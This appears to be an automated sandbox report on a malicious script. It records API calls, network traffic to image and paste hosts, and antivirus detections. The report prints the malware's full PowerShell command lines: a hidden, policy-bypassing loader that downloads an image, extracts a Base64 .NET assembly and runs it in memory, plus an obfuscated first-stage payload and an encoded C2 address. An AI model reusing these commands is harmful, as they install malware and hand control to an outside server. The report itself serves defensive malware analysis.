allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
cmdline powershell -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
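[Analyst note: in the second-stage command line above, the first argument passed to the VAI method of Fiber.Home is Base64 that decodes to a character-reversed URL, hxxp://185.254.37[.]174/mohammeddroidupdatedfilebase64.txt. That host does not appear in this report's IP address list, which is consistent with the run stopping at the failed image download; treat it as an additional indicator to search for rather than as observed traffic.]
Time & API Arguments Status Return Repeated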

CreateProcessInternalW

thread_identifier: 2136
thread_handle: 0x00000588
process_identifier: 2132
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000590
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2232
thread_handle: 0x00000450
process_identifier: 2228
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000454
1 1 0
Symantec ISB.Downloader!gen40
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.VBS.SAgent.gen
Varist VBS/Agent.BFC!Eldorado
ZoneAlarm HEUR:Trojan.VBS.SAgent.gen
Google Detected
AVG Script:SNH-gen [Trj]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received We<Ý"=±Å¿þlJ_ÖhWFIpðæDOWNGRD '”­ jC…_ÿá'šˆ'GËf ÁãòŠ.}ŸŽ“õÀ ÿ 
Data received Q
Data received “
Data received AF¯”Bi¤8¼MG@Ê>Hð¡@oÅöbnz%ã¶}åóà°ÐÀ#؝/LËjwxžˆ™Ø‹Ìy_¸x‰H0F!ÜZ ±v f)âɬ·”V–±»ˆ/Ró—Óùò!Œ9Í)GìÑ öqÂ{3™@Ö,8‡ç ©‹,ôöªðr
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received µe['³-J*ÎÀÇç}$‡œWoqÃýˆû**QQՄ.Ý©U4Ñëø6æþ…J-
Data sent yue<Ý Ùö¹É¿j‚(m‹M8GÑ·¹™(AýE#¨/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBAFm¶L3Û¥º_…{0{ r±¼>¹oÏ܆ ¾#©Y×ù»ñŽ†<ùC0‰/zÌH7Òs‰r“œï0wA×;ç†ÖpJMF6^¬ª†ÓÊp¢D‰²jèî Š|3µ$µ³’RœtÂ\
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

WSASend

buffer: kge<ÝXXAj¶ÎÚoÁ_÷ÊP%lÑbq}CY[ ݹ/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 968
0 0

WSASend

buffer: FBA4¡ ¿ãԈ7¬êVþmŽq¨ðù*Åæ‘—ÕÓÍQdè¿Xq0í NôëM–Sg +ØquZ8.¬åJ`ñºE0RÌ>(q‘ñeš¬£²·âÙ}\ŒóæC†t®@‡ŠÍÂùÚû zŸ@öô ¡¤ç´\
socket: 968
0 0

WSASend

buffer: À¶YÍxžï[ڎ˗ }y¹ƒõ!½5 ­ö†Áƒ]xiÜupÈìHhÝÐ IKˊ[^¤D¢>çýgΰÿÜם +’¤$ °àÈ]î Uå‹ëÇŪPAš`ÀÏ1íѥӚ‹'˜Õ9^f„_¬Ð¹,ìÙ}¦–]Ž©23…“tHƒµ1ä½ô¯F½Ä>®Öw ãxz2µŽ¡†Ô¤ŸfXË^oB ±½#wM¦x8[™¨1—u~6ø›EÉv¦V$
socket: 968
0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
Time & API Arguments Status Return Repeated

WSASend

buffer: kge<ÝXXAj¶ÎÚoÁ_÷ÊP%lÑbq}CY[ ݹ/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 968
0 0

WSASend

buffer: FBA4¡ ¿ãԈ7¬êVþmŽq¨ðù*Åæ‘—ÕÓÍQdè¿Xq0í NôëM–Sg +ØquZ8.¬åJ`ñºE0RÌ>(q‘ñeš¬£²·âÙ}\ŒóæC†t®@‡ŠÍÂùÚû zŸ@öô ¡¤ç´\
socket: 968
0 0

WSASend

buffer: À¶YÍxžï[ڎ˗ }y¹ƒõ!½5 ­ö†Áƒ]xiÜupÈìHhÝÐ IKˊ[^¤D¢>çýgΰÿÜם +’¤$ °àÈ]î Uå‹ëÇŪPAš`ÀÏ1íѥӚ‹'˜Õ9^f„_¬Ð¹,ìÙ}¦–]Ž©23…“tHƒµ1ä½ô¯F½Ä>®Öw ãxz2µŽ¡†Ô¤ŸfXË^oB ±½#wM¦x8[™¨1—u~6ø›EÉv¦V$
socket: 968
0 0

send

buffer: yue<Ý Ùö¹É¿j‚(m‹M8GÑ·¹™(AýE#¨/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1444
sent: 126
1 126 0

send

buffer: FBAFm¶L3Û¥º_…{0{ r±¼>¹oÏ܆ ¾#©Y×ù»ñŽ†<ùC0‰/zÌH7Òs‰r“œï0wA×;ç†ÖpJMF6^¬ª†ÓÊp¢D‰²jèî Š|3µ$µ³’RœtÂ\
socket: 1444
sent: 134
1 134 0

WSASend

buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2020
0 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process wscript.exe martian_process powershell -command "$Codigo = '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
